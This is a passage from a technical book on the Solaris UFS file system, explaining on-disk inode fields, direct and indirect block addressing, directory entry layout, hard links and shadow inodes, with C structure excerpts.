Cc ” Gets or sets the carbon copy field of the email message. From ” Gets or sets the From field of the email message. Headers ” Returns a collection of headers used by the email message. Priority ” Gets or sets a value from the MailPriority enumeration that specifies the priority of the message (possible values are High , Low , and Normal ). Subject ” Gets or sets the Subject field of the email message. To ” Gets or sets the To field of the email message. UrlContentBase ” Gets or sets the Content Base header of an HTML email message. This property is used with the UrlContentLocation property to resolve relative URLs in the body of a message. UrlContentLocation ” Gets or sets the Content Location header of an HTML email message. This property can contain an absolute URL or a relative URL. When UrlContentLocation contains a relative URL, it must be used in conjunction with the UrlContentBase property. For example, imagine that you need to send a high-priority email message to Jane@ yourcompany. com and you want to send a blind carbon copy of the message to your supervisor at supervisor@ yourcompany . com . You could send this message with the following statements: Dim objMailMessage As MailMessage objMailMessage = New MailMessage objMailMessage.From = "you@yourcompany.com" objMailMessage.To = "jane@yourcompany.com" objMailMessage.Subject = "Meeting location changed!" objMailMessage.Body = "The meeting will be in the Salmon room" objMailMessage.Priority = MailPriority.High objMailMessage.Bcc = "supervisor@yourcompany.com" SmtpMail.Send( objMailMessage ) First, an instance of the MailMessage class is created and several of its properties are set. Next, the MailMessage is sent with the Send method of the SmtpMail class. You can attach one or more files to an email message by using the MailAttachment class. The MailAttachment class represents a particular email attachment. This class has the following two properties: Filename ” The path of a file to attach to the email message. Encoding ” A value from the MailEncoding enumeration that specifies how the attached file should be encoded (possible values are Base64 and UUEncode ). You can set these properties on an instance of the MailAttachment class. Alternatively, and more conveniently, you can specify the Filename and Encoding parameters when initializing the class through its constructor like this: objMailMessage = New MailAttachment( "c:\somefile.zip" ) or objMailMessage = New MailAttachment( "c:\somefile.zip", MailEncoding.UUEncode ) The first statement initializes an instance of the MailAttachment class with the path to a file. The second statement initializes an instance of the MailAttachment class with both a path to a file and an encoding format. For example, the ASP.NET page in Listing 26.2 attaches a Microsoft Word document named BizPlan.doc to an email message. <%@ Import Namespace="System.Web.Mail" %> <% Dim objMailMessage As MailMessage Dim objMailAttachment As MailAttachment ' Create the Mail Attachment objMailAttachment = New MailAttachment( "c:\BizPlan.doc" ) ' Create the Mail Message objMailMessage = New MailMessage objMailMessage.From = "you@somewhere.com" objMailMessage.To = "joe@somewhere.com" objMailMessage.Subject = "Secret Business Plan" objMailMessage.Body = "Here's the plan (don't show it to anyone!)" objMailMessage.Attachments.Add( objMailAttachment ) ' Send the Mail Message SmtpMail.Send( objMailMessage ) %> BizPlan Sent! When you execute the ASP.NET page in Listing 26.2, the BizPlan.doc file is emailed to joe@somewhere.com. By default, the SmtpMail class sends email messages as plain text. However, you also have the option to send the body of an email as HTML. If you send an email as an HTML message, then you can include HTML formatting and images in the body of the message. CAUTION Not all email clients support HTML email messages. Even worse , some email clients support some HTML tags and not others. To send an HTML email, set the BodyFormat property of the MailMessage class like this: objMailMessage.BodyFormat = MailFormat.Html The page in Listing 26.3 illustrates how to send an HTML email. <%@ Import Namespace="System.Web.Mail" %> <% Dim objMailMessage As MailMessage Dim strHTMLBody As String ' Create the HTML Message Body strHTMLBody = "<html><head>" & _ "<title>Thank You!</title>" & _ "</head><body bgcolor=lightblue>" & _ "<font face=Script size=6>" & _ "Thank you for registering!" & _ "</font></body></html>" ' Create the Mail Message objMailMessage = New MailMessage objMailMessage.From = "you@somewhere.com" objMailMessage.To = "joe@somewhere.com" objMailMessage.Subject = "Thanks for Registering!" objMailMessage.Body = strHTMLBody objMailMessage.BodyFormat = MailFormat.HTML ' Send the Mail Message SmtpMail.Send( objMailMessage ) %> HTML Email Sent! When you request the ASP.NET page in Listing 26.3, an email message containing a light blue background and a script type face is sent (see Figure 26.3). Writing text with HTML formatting can be messy. Listing 26.3 created a string variable named strHTMLBody that contained the entire HTML for the body of the message. There is a better way to work with HTML in the ASP.NET Framework. You can manipulate HTML with the HtmlTextWriter . To learn more about the HtmlTextWriter , see Chapter 28, "Developing Custom Controls." The page in Listing 26.4 illustrates how you can use the HtmlTextWriter to more cleanly build the body of an HTML( "face", "Script" ) twTextWriter.AddAttribute( "size", "6" ) twTextWriter.RenderBeginTag( "font" ) twTextWriter.WriteLine( "Thank you for registering!" ) = "Thanks for Registering!" objMailMessage.Body = swHtmlBody.ToString objMailMessage.BodyFormat = MailFormat.HTML ' Send the Mail Message SmtpMail.Send( objMailMessage ) %> HTML Email Sent! When including images or links in an HTML email, you must specify the link as an absolute path ”otherwise, the email client won't have enough information to find the proper Web site. In other words, you must use an address like this: rather than the shorter relative address: /somedir/thepage.aspx You can get around this limitation by using the UrlContentBase and UrlContentLocation properties of the MailMessage class. If you assign an absolute URL to the UrlContentLocation property, then all URLs in the body of the message are interpreted relative to that URL. For example, if you assign a value to the UrlContentLocation property like this: objMailMessage.UrlContentLocation = "" then you can use the following IMG tag in the body of the email message: <img src="aspnet.gif"> The path of the image specified in the IMG tag would be resolved to: If you assign a relative URL to the UrlContentLocation property, then you must also assign a value to the UrlContentBase property. The combined values of the UrlContentLocation and UrlContentBase properties would be used to construct an absolute URL. The page in Listing 26.5 demonstrates how you can send an image and resolve the location of the image with the UrlContentLocation( "src", "aspnet.gif" ) twTextWriter.RenderBeginTag( "img" ) = "Here's the image!" objMailMessage.Body = swHTMLBody.ToString objMailMessage.BodyFormat = MailFormat.HTML objMailMessage.UrlContentLocation = "" ' Send the Mail Message SmtpMail.Send( objMailMessage ) %> Image Sent! In Listing 26.5, an image named aspnet.gif is included in the body of the email message. Because the UrlContentLocation property is set, the absolute path to the image on the origin Web site can be resolved ( ).
https://flylib.com/books/en/3.443.1.167/1/
CC-MAIN-2019-51
refinedweb
2,678
58.18
WiFiDirectConnectionState Since: BlackBerry 10.2.0 #include <bb/device/WiFiDirectConnectionState> To link against this class, add the following line to your .pro file: LIBS += -lbbdevice The state of the WiFiDirect connection to the network group. Overview Public Types Index Public Types The state of the WiFiDirect connection to the network group. BlackBerry 10.2.0 - Unknown 0 Unable to determine the current network group state. - Connecting 1 A connection to the network group is currently in progress.Since: BlackBerry 10.2.0 - Connected 2 Currently connected to a network group.Since: BlackBerry 10.2.0 - Disconnected 3 Not currently connected to a network group.Since: BlackBerry 10.2.0 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
https://developer.blackberry.com/native/reference/cascades/bb__device__wifidirectconnectionstate.html
CC-MAIN-2015-11
refinedweb
125
55.1
New Hack Shrinks Docker Containers () 131 destinyland writes: Promising "uber tiny Docker images for all the things," Iron.io has released a new library of base images for every major language optimized to be as small as possible by using only the required OS libraries and language dependencies. "By streamlining the cruft that is attached to the node images and installing only the essentials, they reduced the image from 644 MB to 29MB,"explains one technology reporter, noting this makes it quicker to download and distribute the image, and also more secure. "Less code/less programs in the container means less attack surface..." writes Travis Reeder, the co-founder of Iron.io, in a post on the company's blog. "Most people who start using Docker will use Docker's official repositories for their language of choice, but unfortunately if you use them, you'll end up with images the size of the Empire State Building..." WTF? (Score:3, Insightful) Re: (Score:3, Insightful) Im not a developer, but i think its like install shield for windows. Creates application packages or something. Still the summary should really give a brief definition. Re:WTF? (Score:5, Insightful) Re:WTF? (Score:5, Insightful) Re: (Score:1, Insightful) Not everyone who reads /. is a software developer, a *nix sysadmin, or whatever other area of specialization would use that. When you read a headline and you don't recognize the terminology used in the headline, you have two choices: you can skip the story completely, as it's probably not relevant to what you do; or you can click through the provided links to read more. Making a joke by pretending to misunderstand what the terminology means is a distant third choice. I wish there was a -1, Not Funny moderati Re: (Score:1) If it takes 644 Mb for a "Hello World" program, then that is probably why I have never heard of it. Seriously. Re: (Score:2) I see it's true. Aspies really can't recognize sarcasm. Indeed, it is true that while the Egyptian Cobra can recognize moving objects and sources of heat, it really can't recognize sarcasm. I didn't think people still called them Asps or Aspis, though. Re: (Score:2) Online sarcasm was deprecated in 1986, there was a posting on all Major BBS based systems about it. Kids these days just can't follow the Best Practices. Re: (Score:2) And some of us are software developers, don't consume advertising or "hype" other than places like this. I only clicked on this to find out if it was something interesting, or just the next big blahblah. Judging from the lack of interest displayed even in the "everybody who is anybody heard of it already" responses suggests to me that it is fluff. Anyways, I'm not going to take a long enough break from writing firmware to both look up some unrelated thing, and also talk about it on slashdot. Re: (Score? Re: (Score:2) Use LXC, LXD, or systemd-nspawn Oh no you didn't! Re: (Score:2) But, my comment was really in relation to the piss poor submission, and the failure of Re: (Score:3) Even if you know Docker, fewer people actually think about the implications size have on cloud compute systems. For example Amazon EC2 Container Registry(ECR) gives 500MB for the free tier and it's relatively cheap to store large container images. Most cloud services store these local registries in their network, so you don't incur bandwidth charges from external registries. Also it should start faster and is likely more reliable, but those are just bonuses. It's true that a small image will start faster, but Re: (Score:1) Then they went commercial (everybody needs to buy groceries). Then they were bought out, with the provision that the founders stay on. Eventually they moved on, then mergers and another sale to a , shall we say, a purely capitalist owner. Acro Re: (Score:2) Esoteric doesn't mean what you think it means. It does not mean unusual or rare, it means "intended for or likely to be understood by only a small number of people with a specialized knowledge or interest." Which it is. /. has a wide audience. I'm interested in learning about technologies outside of my bailiwick (which centers on networking). I can usually get an understanding from context in I'm not a developer, and only play a sysadmin at home. Re: (Score:2) But this one was just pure technobabble for anyone outside of very specific fields. Indeed, not all developers run their code "in somebody's cloud," some of us generally expect hardware to be provisioned to run our software. Not saying that the cloud doesn't have its place, but it is rather odd to see people getting snooty over it when "websites running in public clouds" is sortof fry-cook level development. If something I'm working on has a cloud component, that doesn't mean I would want to be deploying it. Most of the people on the development team wouldn't need to know about the cloud-wh Re: (Score:2). Re: (Score:2) Re: (Score:1) It is more like thinstall/thinapp. Everything you need to run the binary is in the package That sounds like a ROM image for a stand alone embedded microcomputer. Have we really gone full circle? There was a reason that we quit doing that! 8-) Re: (Score:2) Right, but this is rewritable. OTOH, so are/were the ROMs... Actually, I have to get back to some firmware programming for a microcontroller, but don't worry: I won't be using the EEPROM, only the flash. Re: (Score:1) Re: (Score:2) Re: (Score:2) They are talking about taking a container which is commonly used for implementing the 'cloud' buzzword and using it to implement the 'IoT' buzzword. Someone pointed out that 'things' generally are a lot more resource constrained than servers, so they've slimmed down their 644MB container to 29MB. Good luck fitting that into the 128kB of flash in the typical microcontroller running your consumer electronics. It's best not to mix everything together in your head until it all becomes the same thing. Containers are great for servers. Even if you ran a container on an embedded device, it would need to run Linux. That's probably not happening on the microcontroller you describe. More importantly theres almost 0 incentive to run Docker on an embedded device simply because theres very few applications which require that kind of isolation on an embedded device. About the only device I've seen with a justified reason to use Re: (Score:2) What are they talking about, and why do I care about the size of the container Levi's ships my Docker khakis in? I find it scary that this post above was actually mod'ed insightful. Slashdot, wtf happened to you? Re: (Score:1) What are they talking about, and why do I care about the size of the container Levi's ships my Docker khakis in? I find it scary that this post above was actually mod'ed insightful. Slashdot, wtf happened to you? We got tired of "SalesPersons" writing the stories! 8-) to pine for my golden days of yesteryear, those are mine. Get your own, order them now and you can have them in a couple decades when you forget what it was really like. LOL. Da'fuk? I have a submission on 2011, so obviously is not yesterday. Plus I had another account that goes back to 1998. But whatever, a post is worth by its content, not but the longevity of the account (and the fact that you use the later speaks more about you than about me.) Re: (Score:2) Right, oh, 2011 isn't yesterday? What, were you born yesterday? No, you didn't have another account, if you did you would use it. If you had been here since the 90s, you would know that. Perhaps your reputation was so awful, you decided to pretend you were born yesterday? No, that isn't any improvement. Or even a believable story. A post is only "worth by its content" in some language I don't speak. On slashdot, a comment has to make sense to have value, and if it doesn't have value and is written by somebod Re: Wha? (Score:1) It's a small thermal exhaust port, right below the main port. Re: (Score:3) That should be the new vulnerability metric. Womp rats. "A new vulnerability was found in the D-Star app this week, rating at 3.8 womp rats. CEO Tarkin downplayed the severity of the vulnerability and promised the D-Star app will continue to enhance system stability without interference from any rogue squadrons of hackers." Re: (Score:3)?... [youtube.com] Re: (Score:2) >> Isn't the attack surface governed by the ports you open up on the Docker containers? I believe they are talking about the ease with which someone could slip malware into a large container image vs. a small container image and have it go undetected. In practice yes, though not in principle (Score:2) Although you describe a common case, it's not the general one. In principle the size of a software attack surface is given by the amount of code which is reachable through an attack conduit like a network, not by the "width" of the conduit. For example, a given network service could be bound to just one IP address or to two, but its attack surface would remain the same despite double the size of the attack conduit. Likewise the point (Score:2) Re: (Score:3) As a developer, I though the entire point of Docker was to reduce dependence on an entire layer of IT: the human gatekeepers in charge of the release systems and procedures and eventually the care and feeding of maintenance systems (who often f*** something up with manual fumbling or delay things with meetings involving coffee-swilling waterbags). At least that's how I've seen Docker used in corporations so far, anyway. Re: (Score:2) Re: (Score:2) I thought what he said was that the development team is being held hostage by IT, who convinced somebody they were "the computer guys" so they should be in charge of "all the technical computery stuff." Re: (Score:2) As a developer, I though the entire point of Docker was to reduce dependence on an entire layer of IT: the human gatekeepers Finally somebody explained both what it is for, and why I haven't heard of it... I'm not suffering under a BOFH! They should have just said in the summary, "Docker, a BOFH-resistant deployment system." Re:the point (Score:5, Informative) The point of Docker is to have a single package ("container") that contains all of its dependencies, running in isolation from any other Docker containers. Since the container is self-contained, it can be run on any Docker host. For example, if you have some wacky old program that only runs on one particular set of library versions, it might be hard for you to get the Docker container just right to make it run; but once you do, that container will Just Work everywhere, and updating packages on the host won't break it. The point of the news story is that someone did a better job of stripping the container down, removing libraries and such that were not true dependencies (weren't truly needed). Not only does this make for smaller containers, but it should reduce the attack surface, by removing resources that are available inside the container. For example, if someone finds a security flaw in library libfoo, this would protect against that security flaw by removing libfoo when it is not needed. It's pretty hard for an exploit to call code in a library if the library isn't present. Also, presumably all development tools and even things like command-line shells would be stripped out. Thus a successful attacker might gain control over a docker container instance, but would have no way to escalate privileges any further. If the stated numbers are correct (a 644 MB container went down to 29 MB) yet the new small package still works, then clearly there is a lot of unnecessary stuff in that standard 644 MB container. Re: (Score:2) If "shrinking to a minimum" is really the goal, then they should take a good look at the kernel itself. It has collected lots of cruft over the past 20+ years. The first Linux "distribution" I booted (Linux kernel 0.12) came on two 1.2MB floppy disks that still had room to hold additional files. A lot has changed since then, but if you claim 'bare essentials' then there's plenty room for improvement. Re: (Score:3) Docker containers don't contain a kernel. They use the host OS for services. Re: (Score:3) The problem with your logic (aside from being irrelevant in the case of Docker since it doesn't include a kernel) is that a lot of the "cruft" has been added as a base requirement to make a bootable modern system, and in many cases to improve performance. You can strip everything back to 20 years ago, but will you be able to run your harddrives in PIO mode 2 all for the sake of making the kernel smaller by not needing UDMA support? Okay contrived example, but that's what I'm talking about. You want a small k Re: (Score:2) God told to run only in 640x480 with 16 colors and get rid of memory protection. USB isn't necessary in any way either. Re: (Score:2) The only thing really unnecessary is obeying an imaginary friend. Re: (Score:2) What I've been wondering is ... isn't that a bitch to maintain security patches? Because you now have all these potentially vulnerable libraries spread out over a bunch of docker containers, completely outside of the control of the package manager. So when the next heartbleed bug comes around, you may think you have patched your system, while in fact the libraries you are exposing to the outside world via your docker apps are still vulnerable. Re: (Score:2) Right, instead of updating the OS packages when a major security 0-day arrives, you need to turn off all your app containers, forward to a parking page, and start recompiling images. But, your dev teams don't have to agree on compatible sets of libraries to use on projects that will be deployed together on the same cloud instances. This trades the ability to deal with those types of problems, for being able to do stuff you couldn't do because your company didn't have anybody that can do that stuff. So without Re: (Score:2) It's actually kind of an inversion. Docker base images for Debian [docker.com], CentOS [docker.com], and Ubuntu [docker.com] are typically 50-100 megabytes. Shrinking down that "base image" doesn't really make sense; Iron.io instead shrunk down images for things like PHP, Node, and Ruby. Even then, you have two main issues. Firstly, if you have something stupid like e.g. PHP not coming with ANYTHING installed (no php-pdo, no php-ldap, etc.), you have to write your own Dockerfile to install PHP. Typically, you can just put "image: php/5.6-fpm Re: (Score:1) While the iron.io folks do manage to squeeze the size down, they do so through the use of Alpine Linux which uses musl libs rather than glibc and friends. There is a post on hackernews... [ycombinator.com] that has a discussion about the pros and cons of using an alpine based image. There is also the deviation from upstream. The official images are a curated set of images and can be maintained by anyone willing to put in the time. For the official images that are not maintained by the upstrea Re: (Score:2) ...that container will Just Work everywhere, and updating packages on the host won't break it. I love this stuff... updating packages on the host won't break "it," even where "it" is some sort of malware bug. It doesn't seem to so much solve a problem as offer a new way to create a compromise between security and convenience. Here, it mostly trades the convenience of security updates at the OS level away for convenience of deploying minimally-maintained packages. If I wanted this, I would just switch to static linking. But I can see how, for development teams that don't have anybody on them that knows Re: (Score:3) Wasn't a common library the entire point of Docker? Packaging the libs with the app, etc, to reduce dependence on the host OS? No, although it's one of Docker's features. Docker images are actually stacked layers of filesystem sub-images operating as overlays, so a typical Docker image might consist of a base OS image, several library images built by the Docker build process, culminating in the actual application image. Done judiciously, those sub-images can be shared by multiple application images, thereby saving space in the Docker image store. But Docker is a lot more than that. You can run virtual networks within containers, sha Re: (Score:2) Will it make using Docker any easier on OSX? Why o why does it need to install an Ubuntu VM guest and run Docker inside that?? It's worse than that. It's Docker on Ubuntu on OSX on Turtles all the way down. Re: (Score:2) Re:Because Docker uses a Linux container (Score:2)? Re: (Score:1) FreeBSD got jails some years ago for the same purpose, and IIRC that was one of the inspirations for the linux version. (Both inspired by containers in Solaris, and earlier iterations of the idea in other OSes). Not that that matters on the MacOS side; the OS X kernel is a weird hybrid thing with a BSD kernel hanging off a Mach microkernel. The BSD parts aren't exactly a full and current FreeBSD, either; IIRC they grabbed a subset they found useful a bunch of years ago. At a guess the jail support didn't mak Re: (Score:1) "FreeBSD got jails some years ago for the same purpose, and IIRC that was one of the inspirations for the linux version. (Both inspired by containers in Solaris, and earlier iterations of the idea in other OSes)." Actually, I believe Jails were first. In order: 1- UNIX chroot 2- FreeBSD jails 3- Solaris Zones 4- Linux Containers Re: (Score:2) So at this rate, Hurd which is also "hanging off a Mach microkernel" is more likely to have native Docker supporter before OS X. :) Re: (Score:2) FreeBSD Jails and Linux Containers are really different beasts. Jails are great if security is your primary consideration. Hence the name: Jails effectively isolate processes and go to great lengths to prevent them from accessing anything outside the jail. Containers use separate kernel namespaces to give groups of processes separate views of kernel global variables. Security (especially with user namespaces) is a bonus, but the primary goal is efficient os-level virtualization and isolation of resources. A Re: (Score:2) You can run Docker on FreeBSD [freebsd.org] thanks to the 64-bit Linux compatibility layer that was added last year. Re: (Score:2) Yeah, except that FreeBSD has had 'jails' for over a decade, which are far more secure than anything Docker brings to bear. Linux has had jails for over a decade. I image that FreeBSD actually goes back further than that. Docker has jails plus virtual networks plus various other isolation mechanisms, so I cannot credit your assertion that a jail-only mechanism is more secure. Re: (Score:1) "Linux has had jails for over a decade. I image that FreeBSD actually goes back further than that." Yep, jails appeared in FreeBSD 4.0-RELEASE around 1999-2000 if I recall correctly. "Docker has jails plus virtual networks plus various other isolation mechanisms, so I cannot credit your assertion that a jail-only mechanism is more secure." To be fair, FreeBSD also has virtual networks so each jail can also run a complete virtualized network. As for a comparison in security, I'm unable to make an informed commen Re: (Score:2) Because it makes heavy use of features inside the Linux kernel which isolate applications from the rest of the operating system. To make Docker work on OSX, you'd have to modify the OS kernel to dramatically change the way it handles system calls and application spaces. Essentially, it groups processes together as if they're running on different kernels, but runs them all in the same kernel. Run a docker container that only runs the command 'ps -e' and it will tell you 'ps' is PID 1. The nginx container So.... thin jails (Score:5, Insightful) iocage create -c Congratulations, you've just (almost) caught up to decade old technology.... [freebsd.dk] Re: (Score:2) This why all the major cloud providers run freebsd. Re: (Score:1) can you also iocage history [docker.com]? docker is to infrastructure what git is to code. Re: (Score:2, Flamebait) docker is to infrastructure what git is to code. No it isn't. You're insulting Git. Docker is to hype what hype is to hype. Re: (Score:2) I've looked at how it works. It looks like you asked a bunch of 20 year olds to re-invent Jails. Just like systemd looks like you asked a bunch of 20 year olds to re-invent init. Re: (Score:2) Why not just run a diff on the jail package file? Re: (Score:1) It's worse, they've combined jails with the equivalent of statically compiled binaries. Bit of a nightmare when there's a vulnerability on a library used in multiple containers. Re: (Score:2, Informative) It's worse, they've combined jails with the equivalent of statically compiled binaries. Bit of a nightmare when there's a vulnerability on a library used in multiple containers. Except it isn't. You store your base images in a docker registry, you update that base image, and then you can have your CI environment kick off rebuilds of any dependent images. And as an added bonus you get to test your exact deployable image, including all dependencies, before you actually roll prod. In the past you needed something akin to a Satellite / Spacewalk setup to be able to lock combinations of versions of packages to a point-in-time snapshot. Most people don't seem to do this. They either Re: (Score:1) It is. You've given a best case usage for docker and a worst case for shared libraries. Official repos? (Score:2) Re: (Score:2) C++ isn't a major language? (Score:2) Re: (Score:2) Yes, you always have. But you can statically link it into your binary. Re: (Score:2) C++ isn't web scale (but Perl is, a a apparently). I will never give up (Score:2) > "Less code/less programs in the container means less attack surface..." *fewer Re: (Score:1) Fine. Less code/less programs in the container means fewer attack surface... Re: (Score:2) Re: (Score:3) Re: (Score:2) Re: (Score:2) *surfacer Re: (Score:1) But "less" takes up fewer space, I'm mean less fewer's, I mean, baaah, nevermind Re: (Score:2) some things are correct and some things are incorrect. just cuz you find something more convenient doesn't change this basic fact. facts are facts! Who cares? (not). Maki Re: (Score:2) So you never run half a dozen docker instances from a ram disc? Unfortunately my Mac only has 8Gig RAM, so the size of the Docker Containers does matter. Image sizes (Score:5, Funny) Most people who start using Docker will use Docker's official repositories for their language of choice, but unfortunately if you use them, you'll end up with images the size of the Empire State Building... What's that in Libraries of Congress? Wait what? (Score:1) Indeed (Score:2) I read this yesterday and I found it slightly annoying in the tone. Alpine has been around for awhile, and I don't think anyone using docker for more than experimentation will be happy with massive Ubuntu based images. But would you really use these minimal images packaged by an unknown entity when you can make your own with one line in the dockerfile? Re: (Score:2) Why the heck did you name them butt kernels? Re: (Score:2) Too lazy to read their FAQ? " Why the name? If you look up "rump" in a dictionary, you'll find a definition which involves the group that is left over after a portion of the contents of a larger group have been removed -- the classic example is a rump parliament. The attribute "rump" therefore establishes the relationship between just a kernel and a rump kernel." Re: (Score:2) Cool story, but why did they name them butt kernels? There isn't anyone who hears "rump" and thinks "ah yes; the smaller portion left behind after the majority has been removed."
https://developers.slashdot.org/story/16/02/03/221231/new-hack-shrinks-docker-containers
CC-MAIN-2016-44
refinedweb
4,255
71.55
15.2 UFS On-Disk Format UFS is built around the concept of a disk's geometry, which is described as the number of sectors in a track, the location of the head, and the number of tracks. UFS uses a hybrid block allocation strategy that allocates full blocks or smaller parts of the block called fragments. A block is a set of contigous fragments starting on a particular boundary. This boundary is determined by the size of a fragment and the number of fragments that constitute a block. For example, fragment 32 and block 32 both relate to the same physical location on disk. Although the next fragment on disk is 33 followed by 34, 35, 36, 37 and so on, the next block is at 40, which begins on fragment 40. This is true in the case of 8-Kbyte block size and 1-Kbyte fragment size, where 8 fragments constitutes a file system block. 15.2.1 On-Disk UFS Inodes In UFS, all information pertaining to a file is stored in a special file index node called the inode (except for the name of the file, which is stored in the directory). There are two types of inodes: in-core and on-disk. The on-disk inodes, as the name implies, reside on disk, whereas the in-core inode is created only when a particular file is opened for reading or writing. The on-disk inode is represented by struct icommon. It occupies exactly 128 bytes on disk and can also be found embedded in the in-core inode structure, as shown in Figure 15.1. Figure 15.1 Embedded On-Disk in In-Core Inode The structure of icommon looks like this. struct icommon { o_mode_t ic_smode; /* 0: mode and type of file */ short ic_nlink; /* 2: number of links to file */ o_uid_t ic_suid; /* 4: owner's user id */ o_gid_t ic_sgid; /* 6: owner's group id */ u_offset_t ic_lsize; /* 8: number of bytes in file */ #ifdef _KERNEL struct timeval32 ic_atime; /* 16: time last accessed */ struct timeval32 ic_mtime; /* 24: time last modified */ struct timeval32 ic_ctime; /* 32: last time inode changed */ #else time32_t ic_atime; /* 16: time last accessed */ int32_t ic_atspare; time32_t ic_mtime; /* 24: time last modified */ int32_t ic_mtspare; time32_t ic_ctime; /* 32: last time inode changed */ int32_t ic_ctspare; #endif daddr32_t ic_db[NDADDR]; /* 40: disk block addresses */ daddr32_t ic_ib[NIADDR]; /* 88: indirect blocks */ int32_t ic_flags; /* 100: cflags */ int32_t ic_blocks; /* 104: 512 byte blocks actually held */ int32_t ic_gen; /* 108: generation number */ int32_t ic_shadow; /* 112: shadow inode */ uid_t ic_uid; /* 116: long EFT version of uid */ gid_t ic_gid; /* 120: long EFT version of gid */ uint32_t ic_oeftflag; /* 124: extended attr directory ino, 0 = none */ }; See usr/src/uts/common/sys/fs/ufs_inode.h Most of the fields are self-explaining, but a couple of them need a bit of help: - ic_smode. Indicates the type of inode. There are primarily four main types of inode: zero, special node (IFCHR, IFBLK, IFIFO, IFSOCK), symbolic link (IFLNK), a directory (IFDIR), a file (IFREG), or an extended metadata inode (IFSHAD, IFATTRDIR). Type zero indicates that the inode is not in use and ic_nlink should be zero, unless logging's reclaim_needed flag is set. With the special nodes, no data blocks are associated. They are used for character and block devices, pipes and sockets. The type file indicates where this inode is a directory, a regular file, a shadow inode, or an extended attribute directory. - ic_nlink. Refers to the number of links to a file, that is, the number of names in the namespace that correspond to a specific file identifier. A regular file will have link count of 1 because only one name in the namespace corresponds to that particular file identifier. A directory link count has the value 2 by default: one is the name of the directory itself, and the other is the "." entry within the directory. Any subdirectory within a directory causes the link count to be incremented by 1 because of the ".." entry. The limit is 32,767 and hence, the limit for the number of subdirectories is 32,765 and also the total number of links. The ".." entry counts against the parent directory only. - ic_db. Is an array that holds 12 pointers to data blocks. These are called the direct blocks. On a system with block size of 8192 bytes or 8 Kbytes, these can accommodate up to 98,304 bytes or 96 Kbytes. If the file consists entirely of direct blocks, then the last block for the file (not the last ic_db entry) may contain fragments. Note that if the file size exceeds the capacity of the ic_db array, then the block list for the file must consist entirely of full-sized file system blocks. - ic_ib. Is a small array of only three pointers but allows a file to be up to one terabyte. How does this work? Well, the first entry in ic_ib points to a block that stores 2048 block addresses. A file with a single indirect block can accommodate up to 8192 * (12 + 2048) bytes or 16 Mbytes. If more storage is required, another level of indirection is added and the second indirect block is used. The second entry in ic_ib points to 2048 block addresses, and each of those 2048 entries points to another block containing 2048 entries that finally point to the data blocks. With two levels of indirection, a file can accommodate up to 8192 * 12 + 2048 + (2048 * 2048) bytes, or 32 Gbytes. A third level of indirection permits the file to be 8192 * 12 + 2048 + (2048 * 2048) + (2048 * 2048 * 2048) = 70,403,120,791,552 bytes long or—yes, you guessed it—64 Tbytes! However, since all addresses must be addressable as fragments, that is, a 31-bit count, the maximum is 2TB (2^31 * 1KB). Multi-terrabyte UFS (MTBUFS) enables 16TB filesystem sizes by enforcing the minimum frag size to be 8K, which gives you 2^31 * 2^10 * 8k, or 16 TB. Figure 15.2 illustrates the layout. Figure 15.2 UFS Block Layout - ic_shadow. If non-zero, contains the number of an inode providing shadow metadata (usually, this data would be ACLs). - ic_oeftflag. If non-zero, contains the number of an inode of type IFATTRDIR, which is a directory containing extended attribute files. 15.2.2 UFS Directories The file name information and hierarchy information that constitute the directory structure of UFS are stored in directories. Each directory stores a list of file names and the inode number for each file; this information (stored in struct direct) allows the directory structure to relate file names to real disk files. The directory itself is stored in a file as a series of chunks, which are groups of the directory entries. Earlier file systems like the System V file system had a fixed directory record length, which meant that a lot of space would be wasted if provision was made for long file names. In the UFS, each directory entry can be of variable length, thus providing a mechanism for long file names without a lot of wasted space. UFS file names can be up to 255 characters long. The group of directory chunks that constitute a directory is stored as a special type of file. The notion of a directory as a type of file allows UFS to implement a hierarchical directory structure: Directories can contain files that are directories. For example, the root directory has a name, "/", and an inode number, 2, which holds a chunk of directory entries holding a number of files and directories. One of these directory entries, named etc, is another directory containing more files and directories. For traversal up and down the file system, the chdir system call opens the directory file in question and then sets the current working directory to point to the new directory file. Figure 15.3 illustrates the directory hierarchy. Figure 15.3 UNIX Directory Hierarchy Each directory contains two special files. The file named "." is a link to the directory itself; the file named ".." is a link to the parent directory. Thus, a change of directory to .. leads to the parent directory. Now let's switch gears and see what the on-disk structures for directories look like. The contents of a directory are broken up into DIRBLKSIZ chunks, also known as dirblks. Each of these contains one or more direct structures. DIRBLKSIZ was chosen to be the same as the size of a disk sector so that modifications to directory entries could be done atomically on the assumption that a sector write either completes successfully or fails (which can no longer be guaranteed with the advancement of cached hard drives). Each directory entry is stored in a structure called direct that contains the inode number (d_ino), the length of the entry (d_reclen), the length of the name (d_namelen), and a null-terminated string for the name itself (d_name). #define DIRBLKSIZ DEV_BSIZE #define MAXNAMLEN 255 struct direct { uint32_t d_ino; /* inode number of entry */ ushort_t d_reclen; /* length of this record */ ushort_t d_namlen; /* length of string in d_name */ char d_name[MAXNAMLEN + 1]; /* name must be no longer than this */ }; See usr/src/uts/common/sys/fs/ufs_fsdir.h d_reclen includes the space consumed by all the fields in a directory entry, including d_name's trailing null character. This facilitates directory entry deletion because when an entry is deleted, if it is not the first entry in the current directory, the entry before it is grown to include the deleted one, that is, d_reclen is incremented to account for the size of the next entry. The procedure is relatively inexpensive and helps keep internal fragmentation down. Figure 15.4 illustrates the concept of directory deletion. Figure 15.4 Deletion of a Directory Entry 15.2.3 UFS Hard Links There is one inode for each file on disk; however, with hard links, each file can have multiple file names. With hard links, file names in multiple directories point to the same on-disk inode. The inode reference count field reflects the number of hard links to the inode. Figure 15.5 illustrates inode 1423 describing a file; two separate directory entries with different names both point to the same inode number. Note that the reference count, refcnt, has been incremented to 2. Figure 15.5 UFS Links 15.2.4 Shadow Inodes UFS allows storage of additional per-inode data through the use of shadow inodes. The implementation of a shadow inode is generic enough to permit storage of any arbitrary data. All that is needed are a tag to identify the data and functions to convert the appropriate data structures from on-disk to in-core, and vice versa. As of this writing (2005), only two data types are defined: FSD_ACL for identification of ACLs and FSD_DFACL for default ACLs. Only one shadow inode is permitted per inode today, and as a result both ACLs and default ACLs are stored in the same shadow inode. typedef struct ufs_fsd { int fsd_type; /* type of data */ int fsd_size; /* size in bytes of ufs_fsd and data */ char fsd_data[1]; /* data */ } ufs_fsd_t; See usr/src/uts/common/sys/fs/ufs_acl.h The way a shadow inode is laid out on disk is quite simple (see Figure 15.6). All the entries for the shadow inode contain one header that includes the type of data and the length of the whole record, data + header. Entries are then simply concatenated and stored to disk as a separate inode with 